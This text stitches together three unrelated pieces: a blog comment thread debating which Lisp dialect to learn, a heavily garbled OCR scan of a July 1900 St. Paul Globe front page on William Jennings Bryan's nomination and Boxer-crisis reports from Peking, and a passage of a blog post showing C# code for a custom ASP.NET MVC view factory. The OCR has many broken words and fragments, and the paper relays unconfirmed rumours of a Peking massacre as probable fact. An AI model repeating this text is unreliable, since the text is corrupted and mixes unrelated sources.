And about the choice of Scheme or Common Lisp or Emacs Lisp or Clojure — Scheme, and in particular PLT Scheme comes with a unique set of features that makes it very easy to extend the language in a way that no other Lisp dialect can do. But unsurprisingly, this is not something you’d run into as a beginner. Emacs Lisp might be useful to learn if you live in Emacs, but from a new language point of view it doesn’t have much to offer. Clojure can be very modern in some aspects (like concurrency, and its approach to data structures), yet in others it is disappointingly the same as older lisps (unhygienic macros, dynamically scoped variables, tail calls) — but saying so will probably lead to some flames… Comparing Common Lisp to (any) Scheme leads to even more flames — so it’s probably best to just skim through a bunch of sites yourself and choose one. Learning one of these is a much better use of time than reading through such flames…
If you do decide to take a closer look at Clojure (which I strongly encourage), there’s a couple of resources I’d like to recommend.
The official web site is. Browsing around a bit will give you an idea of language, how it’s like and unlike other Lisp dialects.
Stuart Halloway’s book ‘Programming Clojure’ is an excellent survey of the language.
Finally, no Lisp discussion these days seems complete without a link to this cartoon:
Why do you poo-poo Clojure, but you are considering Scheme? They’re both dialects of LIsp.
I know you have some weird deal about “getting back to the roots” of 1958, but Common Lisp is not the language of 1958. Common Lisp is the language of the 80’s or whenever it was ANSI standardized. Lisp (aka Lisp 1) and Common Lisp are different animals. I don’t even know if you can find a 1958 Lisp anywhere, and even if you did, why would you want it? It’s not going to eliminate any complexity or make things simpler. In fact it would be *worse*. This isn’t a case of first principles, it’s a case of a horse and buggy (*barely*) vs. a car with an engine and 4 wheels and all the rest of the bits you need to make it a useful transportation device.
On the CL “dialect”/”which to learn” thing, I think you are confusing the language itself with libraries that you might find in some commercial implementations like Franz AllegroCL. The only reason you have to “pick one” is if you want to come out the gate with a ton of library support. They all implement the CL Hyperspec (the ANSI standard), and yeah maybe there are “extras” but these are usually in the form of macros, not extensions to the language itself. The situation is really no different than it is with any C compiler vendor. You get their compiler, and you get their libraries. Write to the spec/standard libraries (defined in the CL Hyperspec), and voila you have portable code. Use somebody else’s socket library and voila, now you have a dependency. How is that different from C? It’s not a language thing, it’s a library thing.
Finally, don’t lump Clojure in with the ASCII art functional languages, or those abominations of pointless complexity like Haskell. Clojure is a Lisp dialect, period, end of story. It’s a well-designed language on a good platform (the JVM). You should consider learning it.
I think this is one of those times when it’s best to start with the most modern thing and then go backwards to learn the culture, where the ideas came from, etc. Start in 1958, and you will most likely give up from sheer frustration before you reach 2010. Good luck.
I’m just glad you didn’t mention AutoLISP.
A general comment to you all: many thanks for what you’ve contributed to this discussion so far. I’m find it very informative, not to mention just plain fun.
foo asked: “Why do you poo-poo Clojure, but you are considering Scheme”. For a very good reason: because of ignorance. I’d not realised that Clojure is a Lisp, but, rather, had it down as one of what foo amusingly calls “ASCII art functional languages”. I know better now, and Clojure is on my radar.
Everyone, please keep the comments coming! I’m sure there is lots more to learn.
You might want to look at this CL/Scheme comparison:
PicoLisp is the one I chose after looking at but not getting into CL, PL kicks ass.
What you can do with it:
You might be running a different Ubuntu GNU/Linux 9.10 than I am, but somehow, I get the impression that your list of available Scheme-implementations only include those where “scheme” is part of the package name…
Of those you mention as available for MacOS, the “universe” repositories appear to include at least chicken (chicken-bin), elk, gambit (gambc) and gauche…
And there’s also scm, guile (guile-1.8, guile-1.6), stalin and scsh…
Arild, you are completely right: not knowing the names of all the other scheme implementations, I only looked at packages whose names contain the string “scheme”. It wasn’t meant to be an exhaustive list!
I guess it’s good that those eight other Schemes are also available …
Ugh.
foo, you said “I don’t even know if you can find a 1958 Lisp anywhere”. Well, you could try McCarthy’s original paper, which implements a Lisp interpreter in Lisp. That’s the oldest I know of, although Lisp is older than the paper: eval was a relatively late addition.
At the risk of being horribly flamed and fed to the trolls, have you considered newlisp? ()
To understand the most basic core of Lisp, it helps to start with Paul Graham’s complete demonstration of the mathematical basis of Lisp in a dozen pages, The Roots Of Lisp (note: in PostScript). It is strongly recommended. McCarthey’s fifty-year-old paper is good, too, but not exactly what you want unless you like history. Steele and Gabriel’s history is nice also if you really do want history.
Paul Graham’s On Lisp is free to download and an excellent somewhat advanced manual.
Common Lisp, Scheme, and Clojure are all fine and have many similarities. I like them all. The brilliant Lisp macro system is available for almost all of them, though some Schemes prefer the toy ‘hygenic’ macro system that is much less powerful.
Don’t forget to use EMACS Lisp and GIMP Scheme scripting, too. I wrote my first Lisp code in the GIMP.
Emacs Lisp, for sheezy. It’s great for getting started as a hobbyist / dabbler. Some of the comments above seem to assume you want to focus maniacally on Emacs (versus playing around with it and seeing if you like it).
Advantages of Emacs Lisp: fully integrated environment with great browseable docs, debugger, and a complete app to work on and extend (ie. Emacs itself). Plus, you already have it!
Some ancient Elisp code I wrote (for illustrative use only :)
Having had Eli as a teacher at NEU and learning PLT Scheme from Eli and Matthias, I can say that PLT Scheme is an elegant language with great extensibility. I do not believe you’ll miss out from not using the MIT Scheme and maybe you’ll even gain a few things. :)
If you go with Scheme, you can enjoy working through The Little Schemer, which is a really fun (and funny, and concise) book. I know you’re a fan of actual printed books, and this one deserves to be a classic.
As for implementation, I arbitrarily chose Guile because it was already installed. Like you, I wasn’t trying to get anything in particular done, I was just hoping to learn something. Guile has some minor syntactic differences from the examples in the book, but nothing I couldn’t work out easily.
(It was also fun to poke around in the interpreter and see how many functions you define in the book are shipped with guile.)
If you are not so hung up on being ‘real standard lisp’, and you use a mac, have a look at impromptu
It gives a nice environment for using scheme for both graphics and sound.
After reading these comments all I can add is; Oh. My. God.
Pingback: The long-overdue serious attempt at Lisp, part 2: is Lisp just too hard? « The Reinvigorated Programmer
IANALP (I am not a lisp programmer), although I have read on it and do want to learn it. What about Paul’s new flavor arc?
You could get in on the ground floor of maybe the next big dialect? Although that goes for Clojure too.
Arc’s syntax is horribly counter-intuitive to any Lisp/Scheme programmer (= for assignment, which is really dangerous when other Lisps use it for equality testing), and I really don’t see what it brings to the game. Esp. when it does not even have a real implementation yet.
If you don’t *want* to learn those other languages, fair enough. That’s your prerogative. But if your justification for your language choice is about “fundamentals” rather than just preference, that’s a different story.
I’d agree about Scheme in the sense that it is the “semantic assembly language”, analogous to how assembly language is the low-level language of hardware, not semantics. You get to write programs on the level of your own syntax tree and syntactic abstraction, and that’s powerful.
However, there are more to “fundamentals” of programming than just programming languages. Software is meant to solve problems, and program-oriented thinking is not the same as system-oriented thinking. To me, 99.999% of all languages focus on making a language that encourages perfect software: a language that prevents all errors, is easy to understand, is lightening fast, etc.
But the most interesting question I’ve heard in all of programming was asked by Joe Armstrong: How do you make reliable software in the presence of software and potentially even *hardware* errors? Most languages never ask the question, or simply shrug it off as being outside the scope of the responsibility of a language. But to me, I think that is an implied requirement for all software! Reliability isn’t about perfection (that most languages strive for, such as perfecting sophisticated typing or being more “pure” functional/OOP/declarative) it’s about *fault-tolerance*. That requires a different way of thinking. There are requirements here that are non-negotiable.
To me, the two “fundamental” languages are:
1. Scheme, to learn the structure and interpretation of all *programming* of software
2. Erlang (for now due to lack of other candidates), to learn how to create *software systems* that are fault tolerant. You don’t automatically get that from Scheme, or from the approach of the structure and interpretation of code, hence why I pick these *two* languages.
Notice I didn’t say “concurrency”. All the “Erlang-style concurrency” hype you hear about in other languages 100% absolutely misses the point. Concurrency is just one requirement on the way to fault-tolerance, the real goal. I highly suggest reading Joe Armstrong’s PhD thesis on Erlang’s website.
Lest you think I’m just promoting Erlang as a fanboy, etc. I’d like to mention that actually Python is my favorite language, but there is a real reason why I mention Erlang here: “fundamentals”. Fault-tolerance and software *system* architecture (NOT program architecture) are best learned in Erlang, among the currently existing languages. Algorithms, data structures, flow of execution, or best learned in something like Scheme.
Thanks, RobW, that’s interesting stuff. Appreciated.
You could try Kawa ( ). It’s a Scheme implementation that can also call Java. So you could learn only Scheme and then add in Java if you’d like later. Also under active development. The interface to Java seems as convenient as Clojure’s also.
Pingback: Tagore Smith on functional programming | The Reinvigorated Programmer | https://reprog.wordpress.com/2010/03/23/the-long-overdue-serious-attempt-at-lisp-part-1-which-lisp/ | CC-MAIN-2015-22 | refinedweb | 3,980 | 70.23 |
VOL. XXIII.-NO. 187.
HI Illll? II
Democratic National Convention Again Names
William Jennings Bryan as the
Party's Standard Bearer
Minority of the Resolutions Committee Made
Harmonious Action of Nominating
Body Possible.
KANSAS CITY, Mo., July G.-Wllllam
Jennings Bryan, of Nebraska, was tonight
placed in nomination for th? presidency
<m the Democratic ticket, on a platform
Ing imperialism, militarism and
trusts, and a Bpedflc declaration for di
ver at the ratio cf sixteen to one. The
tion came as che culmination of
izled demonstration In honor of the
party leaders, lasting twenty-seven mln
and giving utterance to all tho pent
up emotions of the vast multitude. It
followed, also, a fierce struggle through
!ic last thirty-six hours concerning
the platform declaration on silver and on
DAVID B. HILL.
The Hero of the Convention.
tho relative position which the silver ques
tion Is to maintain to the other great is
sues of the day.
It waf, late this afternoon when the con
vention was at iast face to face wilh the
!( viral nomination. Earlier In tho
day th^re had been tedious delays, due to
the inability of the platform committee
to reconcile their differences and present
a r<j.rrt. Until this was ready the con
vention rrnnagers beguiled the time by
putting forward speakers of more or less
prominence to keep the vast audience
from becoming too restless.
Th' 3 first session, beginning at 10 o'clock
tils morning, was entirely fruitless of re
pults, and it was not until late In the
afternoon, when the second session had
begun, that the platform committee was
iit lest able to reach an agreement.
Already Its main features, embodying
the sixteen to one principle, had becomo
known to the delegates, and there was
little delay in giving It unanimous ap
proval. This ended the last chance for
an open rupture on the question of prin
ciples, and left the way clear for the cul
minattng business of tho day—the nom
ination of a candidate.
The vast auditorium was filled to its
utmost capacity when the moment arrived
for the nomination to be made. Not only
were the usual facilities afforded by tick
< is taxed to their utmost, but doorkeep
i i wfie given liberal instructions, un
der which the aisles and areas and all
ible spaces were packed to their full
mlt
NOMINATION MADE.
When the call of states began for the
purpose of placing candidates in nomina
tinn, Alabama yielded its place at the
head of the list to Nebraska, and Oldham,
i stitte, made His way to the plat
torm for the initial speech placing Mr.
Bryan in nomination for the presiden
cy. The orator was strongly voiced and
entertaining, and yet, to the waiting del
• s and spectators there was but one
point to his speech, and that was the stir
ring peroration which closed with the
name of William J. Bryan. This was the
Eignal for the demonstration of the day,
and in a common purpose the great con
course joined in a great tribute of enthu
siastic devotion to tho party leader. A
huge oil painting of Bryan, measuring
llfteen feet across, was brought down
tho main aislo before the delegates. At
the same time the standards of the state
delegations were torn from their sockets
and waved on high, while umbrellas of
red, white and blue, silk banners of the
Bev&ral states and many handsome and
unique transparencies were borne about
the building, amid the deafening clamor
of 20,000 yelling, gesticulating men and
women. All of the intensity of former
demonstrations and much more was add
ed to this final tribute to the leader.
MANY SECONDS.
When the demonstration had spent it
self the speeches seconding the nomina
tion of Mr. Bryan were in order. Sena
tor White (poke for California, giving
the tribute of the Pacific coast to the
Nebraska candidate. When Colorado
Was reached that state yielded to Sena
tor Hill, of New York. The audience
had anxiously awaited the appearance
of the distinguished New Yorker, and he
was accorded a splendid reception, the
HUire audience rising- and cheering wi'd
ly with the single exception of the little
Kn"!]) of Tammany leaders, who sat si
lent throughout the cheers for their New
York associate.
Mr. HiH was In fine voice, and his trib
ute to the Nebraskan touched a sympa
thetic chord in the hearts of the audi
ence. He pictured Bryan as the charn
jikin of the plain people and of the work-
Ingmen, strong with the masses, with
th" ffiriners and with the artisan. When
Hill declared, with dramatic intensity,
that the candidate wouM have the sup
port of his party—a united party—there
was tremendous applause at the sugges
tion of Democratic unity. Aside from
the brilliant eulogry of Bryan the speech
of the New York leader was significant
and attractive in its strong plea for
unity.
''it la a time for wait*, not for divi*.
The St. Paul Globe
-ion," he exclaimed to the rapturous ap
proval of tho great multitude facing him.
The eloquent Daniel, of Virginia, added
his glowing tribute to the candidate,
while former Gov. Pattison, of Pennsyl
vania, spoke for his state and for the
East Gov. McMillan, of Tennessee,
voiced the wishes of a state which had
"furnished three presidents."
HAWAII'S VOICE.
Hawaii, through its delegate, John H.
Wise, made its lirst seconding speech in
a Democratic national convention, and
linaily a sweet voice, a pleasant-faced
woman, from Utah, seconded the nomi
nation of Mr. Bryan in behalf of her
stat". Then came the voting. State af
ter state recorded its vote in behalf of
the Nebraska candidate, giving him the
unanimous votes of all the states and
territories. The managers of the con
vention had decide*) that this was enough
work for one day,and the nominations for
vice presidential candidate was allowed
to go over until tomorrow.
Next to the demonstration for the party
candidate that greeting the announcement
that imperialism was to be the para
mount issue of this campaign was the
most spontaneous and significant of the
day. Senator Tillman read the platform,
and with much force brought out the fact
that imperialism was now given the first
and supreme place among tho issues of
the party.
That the delegates and audience were
in-complete accord with this programme
was shown by the long and continued ap
plause, lasting over twenty-two minutes.
Following this the announcement that the
16 to 1 idea was retained received only
faint and short demonstration, the ap
plause being only continued a few min
ut2s. It was regarded as significant
of the spirit of the delegates. The most
stirring incident of the day was the ap
pearance of Webster Davis, formerly as
sistant secretary of the interior in Mc-
Kinley's administration, in a speech se
verely arraigning the Republican party
for its lack of sympathy for the Boers,
and formally announcing his allegiance
to the Democratic party.
GREAT BATTLE.
But the great battle of the convention
has not been fought under the eyes of
cheer.ng thousands, but in the privacy of
tlio closely guarded quarters of the com
mfttee en platform. Here was waged
throughout last night and again this
morning one- of the most remarkable
struggles that has ever racked this his
toric party. On the one hand was tho
influence of Bryan and the absolute unity
of devotion felt towards him and the
cj use of silver with which his name 1b
inseparably linked. On the other hand
were many of the patriarchs of the party,
men like Daniel, of Virginia, insisting
that the very life of the organization was
endangered by hanging to its old issues,
that the duty of the hour called for new
issues based upon new and vital events.
This contest was at last narrowed down
to the one issue of specifically reaffirming
the party's adherence to a 16 to 1 stand
ard, as desired by Mr. Bryan, or of re
affirming the silmer plank in more gentle
terms. And on this Issue, the brains, the
sagacity, the persuasive eloquence and
the best ability of the convention has for
the last thirty-six hours been engaged in
a battle royal for supremacy. And out
of this fierce struggle the adherents of
Bryan emerged scarred, but victorious.
They have written the platform In their
own way with 16 to 1. But It was a
victory by a scratch, for a single vote
would have turned the scale.
And it has not been a victory with
out concession, for in the final draft sil
ver is no longer "paramount," it is far
down in the platform, whfle in the very
fore front Is the declaration that im
perialism is the "paramount Issue of this
campaign."
There remains only the choice of a can
didate for vice president, and the work
of the convention Is over. There Is every
evidence this choice will be quickly made
tomorrow, although there is still doubt as
to who the nominee will be.
NEXT BIG STRUGGLE ON.
Friends of Vice Presidential Candi
dates Are Busy.
KANSAS CITY, Mo., July 6.—The most
Important development in the vice presi
dential situation tonight was the an
nouncement that when the roll of stat»s
Is called tomorrow for the nomination of
candidates for vice president Alabama
will yield to Florida, and Hon. R. D. Mc-
Donald, of that state, will place Eliot
Danforth, of New York, In nomination.
This programme became known during
the session of the convention tonight,
and was discussed by quite a number of
the leading men ?n different delegations.
Another development was the unques
tioned popularity of David B. Hill for
the place, as manifested In the conven
tion, and the desire expressed in many
quarters for his selection.
The selection, however, Is complicated
by the fact that New York stands in the
way of the selection of either Hill or
Danforth. Hill does not want the nomi
nation, and will take measures to pre
vent his selection. Danforth does want
it, and would be nominated if New York
would present him. But the convention
■will not force a candidate upon New
York against the will of the delegation
from that state. This probably will pre
vent the movement for Danforth from
amounting to very much. It is pretty
generally felt that this movement was
Inaugurated for the purpose of compli
menting Hill and rebuking Croker for
the manner in which Hill and his candi
date, Danforth, were treated under the
direction of Mr. Croker.
But the large state delations will not
lend themselves to any such proposition,
for they are seeking a New York candi
date whom New York will present with
seriousness and who will strengthen the
ticket.
SIDETRACKED.
The past two days have been so occu
pied with the platform that little or no
progress has been made by the candi
dates for the vice presidency. So much
Continued on Fifth Fagre.
FRIDAY MORNING, JULY 6, 19OO.—TEN PAGES.
■i »*.'•'•'•'.'*'•*'***•'*"•*.'•'V*"•*'".**•'•*■"."•''.■!'■'*■•*."•■■ ■ • ■'*''-Vi'*'•*'''■'.'■'."*/'."'■ ;•*••.'•*.*.'\ - 'vvv^CwkvkOkU r%^jyPMJDiCTQuijOi3ißn|rt^^BßK-\»i***''i*'«'j''>r»*V'V/K il
Photo by tUc*
WILLIAM JENNINGS BRYAN.
ibme «i m t m aim
All Information Obtainable Tends to Confirm Belief That the Horrible
Story of Murder Is True.
Chinese Emperor Dead by Poison at Hands of Prince Tuan, and
Empress Dowager May Suffer a Like Fate.
LONDON, July 6, 2:30 a. m.—The story
that all foreigners In Peking were mur
dered on June 30 or July 1 appears to be
circulating simultaneously at Che Foo,
Shanghai and Tien Ts=in. Yet, as it is
not confirmed by official dispatches and
is not traceable to the southern viceroys
who are still in certain connection with
Peking, there is a basis for the hope that
It Is untrue.
Cautious observers at Shanghai recog
nize that even theugh these reports are
rejected, events In Peking must be gal
loping to a tragic end.
Correspondents of the Express at
Shanghai gathered details from Chinese
sources, which pieced together relate that
when the foreigners' ammunition was ex
hausted the Boxers and imperial troops
rushed the British legation and poured
Into the court yard with fanatical fury.
The foreign troops were so hopelessly
outnumbered that their fate was certain.
The moment the mob broke In the court
yard was converted into a shambles.
Others of the invaders spread into the in
terior of the building. One correspondent
"It is only left to hope that in the final
rush of the murderous hordes the men
of- the legations had time to slay with
their own hands their womenkind and
children. The Chinese are whispering
the terrible story under their bFeaths
Their attitude towards foreigners in th
streets has undergone a strange change
The demeanor of the better class o
Chinese is one of pity rather than o
triumph. Even the rabble in the nativ
quarters are silent.
"Something of this culminating tragedy
in the ghastly history of recent events in
Peking seems to pervade the Very atroos
phere here and to compel belief against
all our hopes. The consul fears the report
is too true and the Chinese officials do
not appear to seek reasons for a denial."
POISON OR SWORD.
Two Manchus, who have arrived at
Shanghai, certify to the truth of the
statement that Prince Tuan visked the
pa'.acv' and offered the emperor and th«
dowager empress the alternative of pois
on or the sword. The emperor, they say,
took pclson and died within an hour. The
dowager empress also chose poison, but
craftily swallowed only a portion of what
was offered her and survived. On the
same day the Chinese customs bureau
was destroyed, Sir Robert Hart, the in
spector of customs, and his staff escaping
to the legation.
Intense indignation is felt In Shanghai
against the action of the powers ln^ re
straining Japan from sending an army to
Peking immediately. Th* powers are ac
cused as being as guilty of murder as are
Ibe Prince Tuan'i fanatics, and sir Bob-
err Hart is blamed for nv't having In
formed the foreigners of 'the immense
import of arms, especially a few weeks
ago.
The Chinese commanders are preparing
for a long, severe campJiiKn, and are
putting into operation plans drawn up
by German officers last yea» for resisting
nn invasion from the seab-ard by Rus
sia.
The correspondent of tho Daily Mail
at Fhanghai, telegraphing t>nd«r date of
July 5, 12:15 p. m., says that he believes
that when official Information comes re
garding Peking it may include news of the
outraging of English women and tortur
ing of children. It may be taken for
granted, he asserts, that all foreigners
in Peking have been wiped out.
THEIR CASE HOPJXESS.
Tatot Yu admitted to a correspondent
that the casa of the Europeans in Peking
is utterly hopeless in his opinion. He be
lieves that if they have not yet been
massacred it is only a matter of hours
before they will be.
A letter brought by courier from Pe
king, received in Bhangbai on July 4,
says the Boxers are gathering huge
forces arour.d Peking, reinforcements ar
riving from all directions. This is taken
to indicate a concert of action among the
nobles, who are believed fo have thrown
in their lot with th« Box. raj The em
peror and the empress dowager, the let
ter reads, are completely under the
thumb of Prince Tuan and Yang Ki.
Dispatches from Hong Kong say the
"Triads," a secret society, are assuming
a threatening demeanor on the main
land.
Li Hung Chang has pent 5,000 men to
occupy the bogue forts at the mouth of
the Canton river.
The Chang correspondent of the Daily
Telegraph wires, under da*f- of July 4:
"Yuan Shikai.. governor of Shan Tung,
telegraphs the French consul here that
Prince Tuan is preparing an edict or
dering the extermination r>f 'fill foreign
ers. This is probably intended to prepare
the public for the worst news.
"Chinese cumulative reports, which are
generally believed here, declare all tho
foreigners in Peking to have been mas
sacred.
"The safety of all foreigners in North
China depends upon Japans prompt ac
tion. Japan has 70,000 troops ready, but
is prevented from sending 1 them to China
by International jealousies."
Tho morning papers have ■farious con
tinental dispatches handling the ques
tion as to why Japan does not send more
troops to China, but none of them throws
much light upon the mibject.
LONDON, July s.—The "ft repeated
story of massacre of all the whites in
Peking is being retold today with clr
cumstanoiality that almost^convinces those
who have hitherto refused to credit the
sickening tales. The only hopeful feature
cf the evil news is the fact that it comes
from Chinese sources at Shanffhal, but It
Is realized that even If the tragedy has
not yet been enacted, It cannot long be
delayed unless help comes from unknown
sources. Even the holding of Tien Tsin
against the overwhelming hordes now
pc cms to be a very remote possibility,
while the safety of other treaty ports Is
seriously threatened.
A dispatch that came from Che Foo,
dated yesterday, voices a fear that In
view of the Immense summer rains It
will be impossible for forces to advance
to Peking until autumn.
According to reports from Shanghai,
the Chinese army, on the march south
ward from Peking, has rached Lofa. Thlg
Is presumably Gt-n. Nieh SI Chang's force
Contiuned on Fourth Page,
BULLETIN OF
IMPORTANT NEWS OF THE DAY
Weather Forecast for St. Paul.
Showers; Cooler.
I—Democratic Convention.
Nomination of ilryan.
Development!* in ( hinn.
Vice Presidential Talk.
S-Tornado nt White Bear.
Slhritn In Town.
3— Minneapolis Matters.
KorthTvest JV'ews.
Sporting News.
Result* of Ball Games.
4—Editorial Page.
D. B. Hill's Speech.
Oldham'M .Nominating Speech.
s—Conventions—Convention Proceedings,
o—Conventiono—Convention Proceedings.
B4g Kvmt of the Day.
Silver Republicans.
7 —Convention Proceeding*.
Adopting the Platform.
The Democratic Platform.
B—Popular Wants.
Neivs of Railroads.
N. P. Crop Report.
Supreme Court Decisions.
9—Markets of the World.
July Wheat, 78 I-Sc.
Stocks Active.
Bar Silver, 01 5-Sc.
lO—ln the Field of Labor.
Money for Militia.
State's Supply o f toa. 1
PRICE TWO CENTS-1 SMrSTft. «
uujbroi
Nominated a Second Time as Candidate of the
Democrats for the High Office
of President
Graphic Description of the Wild Demonstra
tions That Followed the Naming
of the Candidate.
Staff Special to the Globe.
KANSAS CITY, Mo., J u l y 5.-William
Jennings Bryan was tonight nominated
a second time as the candidate of the
Democrats for the president of this land
under circumstances which, If not as
dramatic as followed on his "CMwn
of Thorns and Cross of Gold" shibboleth,
were not lacking the least In theatrical
effects, Ingeniously conceived and care
fully executed.
A crowd of 25,000 assembled to view the
leaders of the gold and silver Democrats
cross swords in sharp debate, were
astounded to find that tho debate was off
and that after fighting all night the reso
lutions committee had been able to agree
on a platform that would suit all. It was
regarded as a splendidly executed plat
form, and the crowning triumph of its
conception, perhaps, was the selection of
B. R. Tillman, of South Carolina, to read
It In placo of Chairman Jones. Senator
Tillman is an impressive personality. In
spite of attributes not usually called love
ly, in ringing tones and with an emphasis
In thorough sympathy with every senti
ment expressed In the long platform, the
Southern pyrotechnist commanded un
divldtd attention and added in no small
measure to the enthusiasm of Hh rec< i>
tlon. When the anti-Imperialism plank
was reached by Tillman with marked
emphasis, the crowd cut loose and for
half an hour there was such another
demonstration as marked the mention of
Bryan's name Wednesday night. It was
clearly the climax of the day and of the
convention and the two workman who
had been perched on the roof trusses all
day tp break out Old Glory at the critical
moment were signaled not to wait for
the nomination of Bryan.
Simultaneously almost thousands of
flaps bearing anti-imperialistic qiottoei
were -1.-tributed on the main Moor. In a
moment a thousand flags lluttering .
to the life of the scene. Marching and
countermarching thp Mute banners, the
Hawaiian and California flaps nnd win!
not were to be seen in the parade about
the hall. It was half an hour before
Tillman could resume his reading, and
he was twice thereafter Interrupted by
demonstrations.
When tne resolutions had been adopt
ed, and nominations were proceeded with,
a similar demonstration followed the
close of Oldham's tribute, and then a
few minutes later the crowd resumed its
habitual cries for "Hill," and Hill re-
lINHII NT
DETAILED STORY OF TIIR NOMI
NATION OF WILLIAM J.
■RYAN
HILL WON THE CONVENTION
Grjw-cfally Accepted the Will of the
Majority, Hii*l I'uld IIIkIi Tr Unite
to tlie Nominee—Memorable
Speeches.
CONVENTION HA1.1,, July 8.-Aiter
the adoption of the platform and the
Webster Davis incident, Chairman Ittciv
ardson announced:
"The next business before the conven
tion Is the nomination of a candidate for
the presidency of the United States. The
clerk will call the roll of states."
Before doing so the secretary Toad the
names of the members of the committee
appointed by the chair to confer with
the Populists and silver Republicans in
accordance with the resolution offered by
George Fred Williams at the morning
session. They were: George Fred Wil
liams, Massachusetts; J. G. Berry, Ar
kansas; W. H. Thompson, Nebraska;
Charles Thomas, Colorado; J. 8. Rose,
Wisconsin; Thomas H. Martin, Virginia;
J. G. McGuire,* California; B. K. Till
man, South Carolina; Carter H. Harrison,
Illinois.
"Alabama," the secretary then shouted,
commencing the call of the rolL
"The state of Alabama," said the chair
man of the de-legation of that state,
"yields to Nebraska, the privilege of nam
ing the next president of the United
States."
W. D. Oidham, of Nebraska, who was
to present the name of Mr. Bryan to the
convention, was waiting by the chair
man's desk, and a? the chairman of the
Alabama delegation resumed his seat he
came forward and, with a few grace
ful words, expressed his appreciation of
the favor extended by Alabama in sur
rendering its time to the state of Mr.
Bryan.
Mr. Oidham Is a man of about fifty
years of age, something under middle
size, with a slight forward stoop. His
face Is clean-shaven and hi 9 black hair
was closely cropped. His voice Is clear
and pleasant, and carries far; his delivery
was agreeab'.e, and throughout his ad
dress he received the closest attention of
the convention.
Mr. Oldh&m's speech will be found on
the fourth rage.
MADE BIG HTT.
He caught the fancy of the convention
by his 'statement that the government of
"this couiTy "is bounded on the north by
the constitution; <>n the east by the Mon
rnp doctrine, and on the south by the
sponded. He came to the line fully and
openly, and In a moment yells from the
grallerjr were remarking his re-entrance
tnto the field of vice presidential pos
eibilitles. So alarming to tho Town*
forces was the reception given David
B. that a little later the leaders loot
no time In competing their arrangements
for a demonstration In force before the
various state delegations tonight.
Mr. Towne addressed an enthusinstlo
crowd of several thousand from the bal
cony of the Coates houso, and the dele
gates are being Impressed in every pos-
I
SENATOR Tir.T.MAN. OF SOUTH
CAROLINA.
sible way with the popularity, magnetism
and eloquence of the man from J>uluth.
Although the list of seooiidhm speeches
Included two others who have been con-
H<i.-n-ii possible vice presidential timber,
Pftttteoa and Daniel, Hill's ipeecfa was
the sensation of the day. The cOflsen US
of opinion among Towne's friends was
that David had burned all his bridges be
hind him, and was further from the N< w
York delegation than ever. Whether ..r
not his friends can stattipede th.- con
vention for him this morning ia a ques
tion—a serious one to Towne.
—W. G. McMnrrHy.
Declaration of Independence, and on the
west by the Ten Commandment*."
"The prospects of the Democratic party
are brighter than they were four yearn
ago," he said, and out ol the audience
came a vigorous "no," uttered with con
siderable r-mpha-ia. "Yes, ye-," c.nne from
several directions, to offset the assertion
of the doubting Thomaa.
The interruption caused Mr. Oldhara to
pause for a few seconds-, but he caught
bis swing again and utters] an eulogy of
Mr. Bryant which he delivered with great
force. Ah he proceeded be raised both
hand;-- over his head and spoke with a
slowness and energy that c voice
to j.iK trai i>• corner of the ball.
"And—that — man — is — William Jen.
nings—Bryan," he concluded, bringing
his hands lower with each word until the
last liaii been ottered, When U-- brought
thrm up with b sweep, but quicker than
his motion was the answering cheer that
swept across the convention, n i
simultaneous roar from all pails of the
hall. Up went the delegates upon their
chairs, over Mu-ir heads went thi
and above them all soared and rang the
cheers for Bryan. 'J'Jw bind loyally per
formed Its sharf, but th<- noise f jt
ation was but a drop in the buckej The
members ofthe Nebraska delegation f!'jn<
up a large banner bearing a lik<-, :
Mr. Bryan upon one side, and upoi
other "Nebraska" and a small portrait
of Mr. Bryan, enclosed in a star o!
Whatever may has-.' been the differences
of delegates over the platform, they
seemed to have forgotten tli<m, and all
were as one in favor of the man. New
York vied with. Nebraska and *
venting its enthusiasm. T: oker
was on a chair, both arms alo£t, a Rag
In his right hand, which he waved \iii'->r
ously.
MR. lIILIi CHEERS.
Mr. Hill was not behind him In the
Bhow of loyalty to the nominee, :u:.i.
waving his arms, he let forth a
of cheers that equaled those uttered
by any man on the floor. Over In Il»
linois, Ohio and Indiana, where 1C to I
Is not popular, there was no hesitation
now. The die was cast, the gage >>t
battle lifted, and they swung Into the
line as fiercely as any that had
unfaltering by Mr. Bryan in the nght
before the committee on resolutions.
Round the hall started the Nebraska
men with their huge banner, and, catch
ing up their state emblems, the other
delegations took up the march, waving
flags and hats and cheering at the top
of their voices without cessation tare
for the breath necessary to a fresh out
burst.
The two women delegates from Utah
Joined in the parade, one of them carry.
Ing a small silk banner of White upon
which wan inscribed: "Greetli»«? to Will
lam J. Bryan, from the Democratic Wom
en of Utah."
As the women pnsvrrt alone: the aisle
In front of the New York delegation one
Of the enthusiastic Tammany bi
turned loose a war whoop that ri
any previously uttered on this conti
nent, and pounded one of the women
i h hi wnall I'u.s
token of appreciation. Far from resenfc
Ing the blow, the woman smiled and \>l~
rouetted through the alale formed ol
Ct>uti:>ue<! on Sevfnlli I'uttC
xml | txt | http://chroniclingamerica.loc.gov/lccn/sn90059523/1900-07-06/ed-1/seq-1/ocr/ | CC-MAIN-2016-44 | refinedweb | 4,670 | 69.52 |
In my previous two posts (one and two) discussing the use of AJAX within an ASP.NET MVC Framework application, I’ve tried to demonstrate some ways that the framework can be extended or modified. In keeping with this approach, I thought I’d show how it is possible to change the way that Views are resolved using a “View Factory”. Again, this is much more about the demonstration than the subject matter: i.e. AJAX is incidental to seeing how to use the MVC framework. Please read the previous posts if you want to follow the specific example I’m using here.
Usual disclaimers apply – and this is based on pre-release software that will no doubt change, and therefore this post will likely become outdated.
The key to this post, then, is that instead of using a single View that behaves differently according to whether or not AJAX is supported, I want to have two separate Views – one for AJAX, one for without.
To achieve this is pretty simple.
1. We need to create our own implementation of IViewFactory. This is responsible for locating and creating an instance of an IView (which both ViewPage and ViewUserControl implement).
2. To “inject” (all you DI fans excuse me borrowing the term without using a DI framework) our new View Factory into every Controller we are going to create our own IControllerFactory implementation.
3. We need to configure the framework to use our new Controller Factory.
4. Finally we can create two Views – an AJAX version and a pure HTML version.
Easy huh? Lets fly through the implementation of each of these...
To minimise my effort I’ve sub-classed the WebFormViewFactory;
public class AjaxViewFactory : WebFormViewFactory
{
protected override IView CreateView(
ControllerContext controllerContext,
string viewName,
string masterName, object viewData)
{
string mode = controllerContext.RouteData.Values["mode"] as string;
IView view = null;
try
{
view = base.CreateView(controllerContext, viewName + "-" + mode,
masterName, viewData);
}
catch (InvalidOperationException)
if (view == null)
view = base.CreateView(controllerContext, viewName,
masterName, viewData);
else
throw;
return view;
}
}
